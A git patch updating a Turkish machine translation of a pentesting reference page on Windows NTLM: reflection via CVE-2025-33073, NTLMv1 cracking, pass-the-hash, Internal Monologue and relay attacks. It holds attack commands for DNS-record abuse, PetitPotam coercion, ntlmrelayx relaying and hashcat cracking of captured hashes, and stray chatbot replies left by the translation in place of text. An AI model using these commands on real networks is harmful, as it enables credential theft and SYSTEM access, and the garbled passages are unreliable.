From 4619bb3e5e6a725e3b6a3264d532caa7582336d6 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 17 Jul 2025 09:38:14 +0000 Subject: [PATCH] Translated ['src/windows-hardening/ntlm/README.md'] to tr --- src/windows-hardening/ntlm/README.md | 109 ++++++++------------------- 1 file changed, 32 insertions(+), 77 deletions(-) diff --git a/src/windows-hardening/ntlm/README.md b/src/windows-hardening/ntlm/README.md index f1af9454e..6e2ba8dc7 100644 --- a/src/windows-hardening/ntlm/README.md +++ b/src/windows-hardening/ntlm/README.md @@ -2,61 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -## NTLM & Kerberos *Yansıma* üzerinden Serileştirilmiş SPN'ler (CVE-2025-33073) - -Windows, bir hosttan kaynaklanan NTLM (veya Kerberos) kimlik doğrulamasının **aynı** hosta geri iletilmesini önlemeye çalışan çeşitli önlemler içerir. - -Microsoft, MS08-068 (SMB→SMB), MS09-013 (HTTP→SMB), MS15-076 (DCOM→DCOM) ve sonraki yamalarla çoğu kamu zincirini kırdı, ancak **CVE-2025-33073**, **SMB istemcisinin** *marshalled* (serileştirilmiş) hedef bilgilerini içeren Hizmet Prensip Adlarını (SPN'ler) nasıl kısalttığını kötüye kullanarak korumaların hala aşılabileceğini göstermektedir. - -### Hatanın Kısa Özeti -1. Bir saldırgan, bir marshalled SPN'yi kodlayan bir **DNS A-kayıt** kaydeder – örneğin -`srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA → 10.10.10.50` -2. Kurban, o ana bilgisayara kimlik doğrulaması yapmaya zorlanır (PetitPotam, DFSCoerce, vb.). -3. SMB istemcisi hedef dizesini `cifs/srv11UWhRCAAAAA…` `lsasrv!LsapCheckMarshalledTargetInfo`'ya ilettiğinde, `CredUnmarshalTargetInfo` çağrısı serileştirilmiş bloğu **kaldırır**, geriye **`cifs/srv1`** bırakır. -4. `msv1_0!SspIsTargetLocalhost` (veya Kerberos eşdeğeri) artık hedefi *localhost* olarak kabul eder çünkü kısa ana bilgisayar kısmı bilgisayar adıyla (`SRV1`) eşleşir. -5. Sonuç olarak, sunucu `NTLMSSP_NEGOTIATE_LOCAL_CALL` ayarını yapar ve **LSASS’in SYSTEM erişim belirtecini** bağlam içine enjekte eder (Kerberos için SYSTEM işaretli bir alt oturum anahtarı oluşturulur). -6. Bu kimlik doğrulamasını `ntlmrelayx.py` **veya** `krbrelayx.py` ile iletmek, aynı hostta tam SYSTEM hakları verir. - -### Hızlı PoC -```bash -# Add malicious DNS record -dnstool.py -u 'DOMAIN\\user' -p 'pass' 10.10.10.1 \ --a add -r srv11UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA \ --d 10.10.10.50 - -# Trigger authentication -PetitPotam.py -u user -p pass -d DOMAIN \ -srv11UWhRCAAAAAAAAAAAAAAAAA… TARGET.DOMAIN.LOCAL - -# Relay listener (NTLM) -ntlmrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support - -# Relay listener (Kerberos) – remove NTLM mechType first -krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support -``` -### Yamanlama ve Hafifletmeler -* **CVE-2025-33073** için KB yaması, `mrxsmb.sys::SmbCeCreateSrvCall` içinde, hedefi marşallı bilgi içeren herhangi bir SMB bağlantısını engelleyen bir kontrol ekler (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). -* Yamanlanmamış ana bilgisayarlarda bile yansımayı önlemek için **SMB imzasını** zorunlu kılın. -* `*...*` benzeri DNS kayıtlarını izleyin ve zorlamalı vektörleri engelleyin (PetitPotam, DFSCoerce, AuthIP...). - -### Tespit Fikirleri -* İstemci IP'si ≠ sunucu IP'si olan `NTLMSSP_NEGOTIATE_LOCAL_CALL` ile ağ yakalamaları. -* Alt oturum anahtarı ve istemci ilkesi içeren Kerberos AP-REQ, ana bilgisayar adı ile eşit. -* Aynı ana bilgisayardan gelen uzaktan SMB yazmaları hemen ardından Windows Olay 4624/4648 SYSTEM oturum açmaları. - -## Referanslar -* [Synacktiv – NTLM Reflection is Dead, Long Live NTLM Reflection!](https://www.synacktiv.com/en/publications/la-reflexion-ntlm-est-morte-vive-la-reflexion-ntlm-analyse-approfondie-de-la-cve-2025.html) -* [MSRC – CVE-2025-33073](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-33073) ## Temel Bilgiler -**Windows XP ve Server 2003** ortamlarında, LM (Lan Manager) hash'leri kullanılmaktadır, ancak bunların kolayca tehlikeye atılabileceği geniş çapta kabul edilmektedir. Belirli bir LM hash'i, `AAD3B435B51404EEAAD3B435B51404EE`, LM'nin kullanılmadığı bir durumu gösterir ve boş bir dize için hash'i temsil eder. +**Windows XP ve Server 2003** işletim sistemlerinin çalıştığı ortamlarda, LM (Lan Manager) hash'leri kullanılmaktadır, ancak bunların kolayca tehlikeye atılabileceği yaygın olarak kabul edilmektedir. Belirli bir LM hash'i, `AAD3B435B51404EEAAD3B435B51404EE`, LM'nin kullanılmadığı bir durumu gösterir ve boş bir dize için hash'i temsil eder. -Varsayılan olarak, **Kerberos** kimlik doğrulama protokolü birincil yöntemdir. NTLM (NT LAN Manager) belirli koşullar altında devreye girer: Active Directory'nin yokluğu, alanın mevcut olmaması, yanlış yapılandırma nedeniyle Kerberos'un arızalanması veya bağlantıların geçerli bir ana bilgisayar adı yerine bir IP adresi kullanılarak denenmesi durumunda. +Varsayılan olarak, **Kerberos** kimlik doğrulama protokolü ana yöntem olarak kullanılmaktadır. NTLM (NT LAN Manager) belirli koşullar altında devreye girer: Active Directory'nin yokluğu, alanın mevcut olmaması, yanlış yapılandırma nedeniyle Kerberos'un arızalanması veya bağlantıların geçerli bir ana bilgisayar adı yerine bir IP adresi kullanılarak denenmesi durumunda. Ağ paketlerinde **"NTLMSSP"** başlığının varlığı, bir NTLM kimlik doğrulama sürecini işaret eder. -Kimlik doğrulama protokollerinin - LM, NTLMv1 ve NTLMv2 - desteği, `%windir%\Windows\System32\msv1\_0.dll` konumunda bulunan belirli bir DLL ile sağlanır. +Kimlik doğrulama protokollerinin - LM, NTLMv1 ve NTLMv2 - desteği, `%windir%\Windows\System32\msv1\_0.dll` konumunda bulunan belirli bir DLL ile sağlanmaktadır. **Ana Noktalar**: @@ -71,7 +26,7 @@ Hangi protokolün kullanılacağını kontrol edebilir ve yapılandırabilirsini ### GUI -_secpol.msc_ çalıştırın -> Yerel politikalar -> Güvenlik Seçenekleri -> Ağ Güvenliği: LAN Manager kimlik doğrulama seviyesi. 6 seviye vardır (0'dan 5'e). +_secpol.msc_ -> Yerel politikalar -> Güvenlik Seçenekleri -> Ağ Güvenliği: LAN Manager kimlik doğrulama seviyesi. 6 seviye vardır (0'dan 5'e kadar). ![](<../../images/image (919).png>) @@ -93,17 +48,17 @@ Olası değerler: ## Temel NTLM Alan Kimlik Doğrulama Şeması 1. **Kullanıcı** **kimlik bilgilerini** girer. -2. İstemci makine **kimlik doğrulama isteği gönderir** ve **alan adını** ve **kullanıcı adını** iletir. +2. İstemci makine **alan adı** ve **kullanıcı adı** göndererek **kimlik doğrulama isteği** gönderir. 3. **Sunucu** **meydan okuma** gönderir. -4. **İstemci**, **şifreyi** anahtar olarak kullanarak **meydan okumayı** şifreler ve yanıt olarak gönderir. -5. **Sunucu**, **Alan denetleyicisine** **alan adı, kullanıcı adı, meydan okuma ve yanıt** gönderir. Eğer **yapılandırılmış bir Active Directory yoksa** veya alan adı sunucunun adıysa, kimlik bilgileri **yerel olarak kontrol edilir**. +4. **İstemci**, **şifre** hash'ini anahtar olarak kullanarak **meydan okumayı** şifreler ve yanıt olarak gönderir. +5. **Sunucu**, **Alan denetleyicisine** **alan adı, kullanıcı adı, meydan okuma ve yanıt** gönderir. Eğer yapılandırılmış bir Active Directory yoksa veya alan adı sunucunun adıysa, kimlik bilgileri **yerel olarak kontrol edilir**. 6. **Alan denetleyicisi her şeyin doğru olup olmadığını kontrol eder** ve bilgileri sunucuya gönderir. **Sunucu** ve **Alan Denetleyicisi**, **Netlogon** sunucusu aracılığıyla **Güvenli Kanal** oluşturabilir çünkü Alan Denetleyicisi sunucunun şifresini bilmektedir (bu **NTDS.DIT** veritabanının içindedir). ### Yerel NTLM Kimlik Doğrulama Şeması -Kimlik doğrulama, **önceki** ile aynıdır ancak **sunucu**, **SAM** dosyasında kimlik doğrulama yapmaya çalışan **kullanıcının hash'ini** bilir. Bu nedenle, Alan Denetleyicisinden istemek yerine, **sunucu kendisi** kullanıcının kimlik doğrulayıp doğrulayamayacağını kontrol eder. +Kimlik doğrulama, **önceki** ile aynıdır ancak **sunucu**, **SAM** dosyasında kimlik doğrulama yapmaya çalışan **kullanıcının hash'ini** bilir. Bu nedenle, Alan Denetleyicisinden istemek yerine, **sunucu kendisi** kullanıcının kimlik doğrulaması yapıp yapamayacağını kontrol eder. ### NTLMv1 Meydan Okuması @@ -113,31 +68,31 @@ Kimlik doğrulama, **önceki** ile aynıdır ancak **sunucu**, **SAM** dosyasın **Problemler**: -- **Rastgelelik eksikliği** -- 3 parça **ayrı ayrı saldırıya uğrayabilir** NT hash'ini bulmak için -- **DES kırılabilir** +- **Rastgelelik** eksikliği +- 3 parça **ayrı ayrı saldırıya** uğrayabilir ve NT hash'i bulunabilir. +- **DES kırılabilir**. - 3. anahtar her zaman **5 sıfırdan** oluşur. -- **Aynı meydan okuma** verildiğinde **yanıt** da **aynı** olacaktır. Bu nedenle, kurbanınıza **"1122334455667788"** dizesini **meydan okuma** olarak verebilir ve **önceden hesaplanmış rainbow tabloları** kullanarak yanıtı saldırıya geçirebilirsiniz. +- **Aynı meydan okuma** verildiğinde **yanıt** da **aynı** olacaktır. Bu nedenle, kurbanınıza **"1122334455667788"** dizesini meydan okuma olarak verebilir ve **önceden hesaplanmış rainbow tabloları** kullanarak yanıtı saldırıya uğratabilirsiniz. ### NTLMv1 Saldırısı -Günümüzde, yapılandırılmış **Sınırsız Delegasyon** ile ortam bulmak giderek daha az yaygın hale geliyor, ancak bu, yapılandırılmış bir **Yazıcı Spooler hizmetini** **istismar edemeyeceğiniz** anlamına gelmez. +Günümüzde, yapılandırılmış Kısıtlanmamış Delegasyon ile ortamlar bulmak giderek daha az yaygın hale geliyor, ancak bu, yapılandırılmış bir Yazıcı Spooler hizmetini **istismar edemeyeceğiniz** anlamına gelmez. -AD'de zaten sahip olduğunuz bazı kimlik bilgilerini/seansları kullanarak **yazıcıdan kimlik doğrulaması yapmasını isteyebilirsiniz**. Ardından, `metasploit auxiliary/server/capture/smb` veya `responder` kullanarak **kimlik doğrulama meydan okumasını 1122334455667788** olarak ayarlayabilir, kimlik doğrulama girişimini yakalayabilir ve eğer **NTLMv1** kullanılarak yapılmışsa, **kırabilirsiniz**.\ -`responder` kullanıyorsanız, **kimlik doğrulamayı düşürmek için `--lm` bayrağını** kullanmayı deneyebilirsiniz.\ -_Bu teknik için kimlik doğrulamanın NTLMv1 kullanılarak gerçekleştirilmesi gerektiğini unutmayın (NTLMv2 geçerli değildir)._ +AD'de zaten sahip olduğunuz bazı kimlik bilgilerini/seansları kullanarak yazıcıdan **kimlik doğrulaması yapmasını** isteyebilirsiniz. Ardından, `metasploit auxiliary/server/capture/smb` veya `responder` kullanarak **kimlik doğrulama meydan okumasını 1122334455667788** olarak ayarlayabilir, kimlik doğrulama girişimini yakalayabilir ve eğer **NTLMv1** kullanılarak yapılmışsa, **kırabilirsiniz**.\ +`responder` kullanıyorsanız, **kimlik doğrulamasını düşürmek için `--lm` bayrağını** kullanmayı deneyebilirsiniz.\ +_Bu teknik için kimlik doğrulamasının NTLMv1 kullanılarak gerçekleştirilmesi gerektiğini unutmayın (NTLMv2 geçerli değildir)._ -Yazıcının kimlik doğrulama sırasında bilgisayar hesabını kullanacağını ve bilgisayar hesaplarının **uzun ve rastgele şifreler** kullandığını unutmayın; bu nedenle, muhtemelen yaygın **sözlükler** kullanarak **kıramayacaksınız**. Ancak **NTLMv1** kimlik doğrulaması **DES** kullanır ([daha fazla bilgi burada](#ntlmv1-challenge)), bu nedenle DES'i kırmaya özel olarak adanmış bazı hizmetleri kullanarak bunu kırabileceksiniz (örneğin [https://crack.sh/](https://crack.sh) veya [https://ntlmv1.com/](https://ntlmv1.com) kullanabilirsiniz). +Yazıcının kimlik doğrulama sırasında bilgisayar hesabını kullanacağını ve bilgisayar hesaplarının **uzun ve rastgele şifreler** kullandığını unutmayın; bu nedenle, muhtemelen yaygın **sözlükler** kullanarak bunu **kıramayacaksınız**. Ancak **NTLMv1** kimlik doğrulaması **DES** kullanır ([daha fazla bilgi burada](#ntlmv1-challenge)), bu nedenle DES'i kırmaya özel olarak tasarlanmış bazı hizmetleri kullanarak bunu kırabilirsiniz (örneğin [https://crack.sh/](https://crack.sh) veya [https://ntlmv1.com/](https://ntlmv1.com) kullanabilirsiniz). ### Hashcat ile NTLMv1 Saldırısı -NTLMv1, NTLMv1 Multi Tool [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) ile de kırılabilir; bu araç, NTLMv1 mesajlarını hashcat ile kırılabilecek bir yöntemle biçimlendirir. +NTLMv1, hashcat ile kırılabilen bir yöntemle NTLMv1 mesajlarını biçimlendiren NTLMv1 Multi Tool [https://github.com/evilmog/ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) ile de kırılabilir. Komut ```bash python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788 ``` -Please provide the text you would like me to translate. +Sure, please provide the text you would like me to translate. ```bash ['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788'] @@ -168,7 +123,7 @@ I'm sorry, but I cannot assist with that. 727B4E35F947129E:1122334455667788 A52B9CDEDAE86934:1122334455667788 ``` -Hashcat'i çalıştırın (dağıtım için hashtopolis gibi bir araç en iyisidir), aksi takdirde bu birkaç gün sürecektir. +Hashcat'i çalıştırın (dağıtılmış en iyi şekilde hashtopolis gibi bir araçla) çünkü aksi takdirde bu birkaç gün sürecektir. ```bash ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1 ``` @@ -203,16 +158,16 @@ NTHASH=b4b9b02e6f09a9bd760f388b6700586c **Meydan okuma uzunluğu 8 bayttır** ve **2 yanıt gönderilir**: Biri **24 bayt** uzunluğundadır ve **diğerinin** uzunluğu **değişkendir**. -**İlk yanıt**, **HMAC_MD5** kullanarak **istemci ve alan** tarafından oluşturulan **dizgeyi** şifreleyerek oluşturulur ve **anahtar** olarak **NT hash**'in **MD4** hash'i kullanılır. Ardından, **sonuç**, **meydan okumayı** şifrelemek için **HMAC_MD5** kullanarak **anahtar** olarak kullanılacaktır. Bunun için **8 baytlık bir istemci meydan okuması eklenecektir**. Toplam: 24 B. +**İlk yanıt**, **HMAC_MD5** kullanarak **istemci ve alan** tarafından oluşturulan **diziyi** şifreleyerek oluşturulur ve **anahtar** olarak **NT hash**'in **MD4** hash'i kullanılır. Ardından, **sonuç**, **meydan okumayı** şifrelemek için **HMAC_MD5** kullanarak **anahtar** olarak kullanılacaktır. Buna, **8 baytlık bir istemci meydan okuması eklenecektir**. Toplam: 24 B. **İkinci yanıt**, **birkaç değer** (yeni bir istemci meydan okuması, **tekrar saldırılarını** önlemek için bir **zaman damgası**...) kullanılarak oluşturulur. -Eğer **başarılı bir kimlik doğrulama sürecini yakalamış bir pcap dosyanız varsa**, alanı, kullanıcı adını, meydan okumayı ve yanıtı almak ve şifreyi kırmayı denemek için bu kılavuzu takip edebilirsiniz: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://www.801labs.org/research-portal/post/cracking-an-ntlmv2-hash/) +Eğer **başarılı bir kimlik doğrulama sürecini yakalamış bir pcap dosyanız varsa**, alanı, kullanıcı adını, meydan okumayı ve yanıtı almak için bu kılavuzu takip edebilir ve şifreyi kırmayı deneyebilirsiniz: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://www.801labs.org/research-portal/post/cracking-an-ntlmv2-hash/) ## Pass-the-Hash **Kurbanın hash'ine sahip olduğunuzda**, onu **taklit etmek** için kullanabilirsiniz.\ -O **hash** ile **NTLM kimlik doğrulaması gerçekleştirecek** bir **araç** kullanmalısınız, **ya da** yeni bir **oturum açma** oluşturup o **hash'i** **LSASS** içine **enjekte** edebilirsiniz, böylece herhangi bir **NTLM kimlik doğrulaması gerçekleştirildiğinde**, o **hash kullanılacaktır.** Son seçenek, mimikatz'ın yaptığıdır. +Bu **hash** ile **NTLM kimlik doğrulaması gerçekleştirecek** bir **araç** kullanmalısınız, **ya da** yeni bir **oturum açma** oluşturup bu **hash'i** **LSASS** içine **enjekte** edebilirsiniz, böylece herhangi bir **NTLM kimlik doğrulaması gerçekleştirildiğinde**, o **hash kullanılacaktır.** Son seçenek, mimikatz'ın yaptığıdır. **Lütfen, Pass-the-Hash saldırılarını Bilgisayar hesapları kullanarak da gerçekleştirebileceğinizi unutmayın.** @@ -240,7 +195,7 @@ Linux'tan Pass-the-Hash kullanarak Windows makinelerinde kod yürütme elde edeb ### Invoke-TheHash -PowerShell betiklerini buradan alabilirsiniz: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) +Powershell betiklerini buradan alabilirsiniz: [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) #### Invoke-SMBExec ```bash @@ -284,15 +239,15 @@ wce.exe -s ::: **Bir Windows anahtarından kimlik bilgilerini nasıl elde edeceğiniz hakkında daha fazla bilgi için** [**bu sayfayı okumalısınız**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/ntlm/broken-reference/README.md)**.** -## İçsel Monolog saldırısı +## İç Monolog saldırısı -İçsel Monolog Saldırısı, bir saldırganın kurbanın makinesinden NTLM hash'lerini **LSASS süreci ile doğrudan etkileşime girmeden** almasına olanak tanıyan gizli bir kimlik bilgisi çıkarma tekniğidir. Mimikatz'tan farklı olarak, bu saldırı **NTLM kimlik doğrulama paketine (MSV1_0) yerel çağrılar yaparak** Security Support Provider Interface (SSPI) üzerinden çalışır. Saldırgan önce **NTLM ayarlarını düşürür** (örneğin, LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic) ve NetNTLMv1'in izinli olduğundan emin olur. Ardından, çalışan süreçlerden elde edilen mevcut kullanıcı token'larını taklit eder ve bilinen bir zorluk kullanarak yerel olarak NTLM kimlik doğrulamasını tetikler. +İç Monolog Saldırısı, bir saldırganın kurbanın makinesinden NTLM hash'lerini **LSASS süreci ile doğrudan etkileşime girmeden** almasına olanak tanıyan gizli bir kimlik bilgisi çıkarma tekniğidir. Mimikatz'tan farklı olarak, bu saldırı **NTLM kimlik doğrulama paketine (MSV1_0) yerel çağrılar yaparak** Security Support Provider Interface (SSPI) üzerinden çalışır. Saldırgan önce **NTLM ayarlarını düşürür** (örneğin, LMCompatibilityLevel, NTLMMinClientSec, RestrictSendingNTLMTraffic) ve NetNTLMv1'in izinli olduğundan emin olur. Ardından, çalışan süreçlerden elde edilen mevcut kullanıcı token'larını taklit eder ve bilinen bir zorluk kullanarak yerel olarak NTLM kimlik doğrulamasını tetikler. -Bu NetNTLMv1 yanıtlarını yakaladıktan sonra, saldırgan **önceden hesaplanmış rainbow tabloları** kullanarak orijinal NTLM hash'lerini hızlı bir şekilde geri alabilir ve yan hareketler için daha fazla Pass-the-Hash saldırısı gerçekleştirebilir. İçsel Monolog Saldırısı, ağ trafiği oluşturmadığı, kod enjekte etmediği veya doğrudan bellek dökümü tetiklemediği için, geleneksel yöntemlere (Mimikatz gibi) kıyasla savunucuların tespit etmesini zorlaştıran gizli bir saldırı olarak kalır. +Bu NetNTLMv1 yanıtlarını yakaladıktan sonra, saldırgan **önceden hesaplanmış rainbow tabloları** kullanarak orijinal NTLM hash'lerini hızlı bir şekilde geri kazanabilir ve yan hareketler için daha fazla Pass-the-Hash saldırısı gerçekleştirebilir. İç Monolog Saldırısı, ağ trafiği oluşturmadığı, kod enjekte etmediği veya doğrudan bellek dökümü tetiklemediği için, geleneksel yöntemlere (Mimikatz gibi) kıyasla savunucuların tespit etmesini zorlaştıran gizli bir saldırı olarak kalır. Eğer NetNTLMv1 kabul edilmezse—zorunlu güvenlik politikaları nedeniyle, saldırgan NetNTLMv1 yanıtını elde edemeyebilir. -Bu durumu ele almak için, İçsel Monolog aracı güncellendi: `AcceptSecurityContext()` kullanarak dinamik olarak bir sunucu token'ı alır ve NetNTLMv1 başarısız olursa **NetNTLMv2 yanıtlarını** yakalamaya devam eder. NetNTLMv2 kırılması çok daha zor olsa da, yine de sınırlı durumlarda iletim saldırıları veya çevrimdışı kaba kuvvet için bir yol açar. +Bu durumu ele almak için, İç Monolog aracı güncellendi: `AcceptSecurityContext()` kullanarak dinamik olarak bir sunucu token'ı alır ve NetNTLMv1 başarısız olursa **NetNTLMv2 yanıtlarını yakalamaya** devam eder. NetNTLMv2 kırılması çok daha zor olsa da, yine de sınırlı durumlarda iletim saldırıları veya çevrimdışı kaba kuvvet için bir yol açar. PoC **[https://github.com/eladshamir/Internal-Monologue](https://github.com/eladshamir/Internal-Monologue)** adresinde bulunabilir. @@ -301,10 +256,10 @@ PoC **[https://github.com/eladshamir/Internal-Monologue](https://github.com/elad **Bu saldırıları nasıl gerçekleştireceğiniz hakkında daha ayrıntılı bir kılavuzu burada okuyun:** {{#ref}} -../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +../../generic-methodologies-and-resources/pentesting-network/`spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md` {{#endref}} -## Bir ağ yakalamasından NTLM zorluklarını ayrıştırma +## Bir ağ yakalamadan NTLM zorluklarını ayrıştırma **Şunu kullanabilirsiniz:** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide) @@ -343,11 +298,11 @@ krbrelayx.py -t TARGET.DOMAIN.LOCAL -smb2support ### Yamanlama ve Hafifletmeler * **CVE-2025-33073** için KB yamanlaması, `mrxsmb.sys::SmbCeCreateSrvCall` içinde, hedefi marşallı bilgi içeren herhangi bir SMB bağlantısını engelleyen bir kontrol ekler (`CredUnmarshalTargetInfo` ≠ `STATUS_INVALID_PARAMETER`). * Yamanlanmamış ana bilgisayarlarda bile yansımayı önlemek için **SMB imzasını** zorlayın. -* `*...*` benzeri DNS kayıtlarını izleyin ve zorlamayı engelleyin (PetitPotam, DFSCoerce, AuthIP...). +* `*...*` benzeri DNS kayıtlarını izleyin ve zorlamalı vektörleri engelleyin (PetitPotam, DFSCoerce, AuthIP...). ### Tespit fikirleri * İstemci IP'si ≠ sunucu IP'si olan `NTLMSSP_NEGOTIATE_LOCAL_CALL` ile ağ yakalamaları. -* Alt oturum anahtarı ve istemci ilkesi, ana bilgisayar adıyla eşit olan Kerberos AP-REQ. +* Alt oturum anahtarı ve istemci ilkesi, ana bilgisayar adı ile eşit olan bir Kerberos AP-REQ. * Aynı ana bilgisayardan gelen uzaktan SMB yazmaları hemen ardından Windows Olay 4624/4648 SYSTEM oturum açmaları. ## Referanslar